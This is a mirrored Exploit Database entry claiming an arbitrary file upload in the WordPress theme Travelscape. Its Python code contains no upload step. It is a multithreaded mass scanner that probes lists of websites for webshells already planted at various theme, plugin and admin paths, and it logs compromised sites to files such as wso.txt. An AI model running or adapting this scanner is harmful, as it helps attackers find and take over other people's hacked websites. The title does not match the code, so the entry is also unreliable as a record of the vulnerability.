WordPress Theme Travelscape v1.0.3 – Arbitrary File Upload

• Exploit Database
• 136 阅读

• 作者： Milad karimi
  日期： 2024-04-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51969/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142

  # Exploit Title: WordPress Theme Travelscape v1.0.3 - Arbitrary File Upload # Date: 2024-04-01 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox   import sys import os.path import requests import re import urllib3 from requests.exceptions import SSLError from multiprocessing.dummy import Pool as ThreadPool from colorama import Fore, init init(autoreset=True) error_color = Fore.RED info_color = Fore.CYAN success_color = Fore.GREEN highlight_color = Fore.MAGENTA requests.urllib3.disable_warnings() headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',   'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'Referer': 'www.google.com' } def URLdomain(url): if url.startswith("http://"): url = url.replace("http://", "") elif url.startswith("https://"): url = url.replace("https://", "") if '/' in url: url = url.split('/')[0] return url def check_security(url): fg = success_color fr = error_color try: url = 'http://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/travelscape/json.php', headers=headers, allow_redirects=True, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/travelscape/json.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/aahana/json.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/aahana/json.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) check = requests.get(url + '/wp-content/themes/travel/issue.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/about.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/about.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/digital-download/new.php', headers=headers, allow_redirects=True, timeout=15) if '#0x2525' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'http://' + URLdomain(url) check = requests.get(url + '/epinyins.php', headers=headers, allow_redirects=True, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/epinyins.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-admin/dropdown.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Simple Shell' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('dummyyummy.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) except Exception as e: print(f' -| {url} --> {fr}[Failed] due to: {e}') def main(): try: url_file_path = sys.argv[1] except IndexError: url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ") if not os.path.isfile(url_file_path): print(f"{error_color}[ERROR] The specified file path is invalid.") sys.exit(1) try: urls_to_check = [line.strip() for line in open(url_file_path, 'r', encoding='utf-8').readlines()] except Exception as e: print(f"{error_color}[ERROR] An error occurred while reading the file: {e}") sys.exit(1) pool = ThreadPool(20) pool.map(check_security, urls_to_check) pool.close() pool.join() print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.") if __name__ == "__main__": main()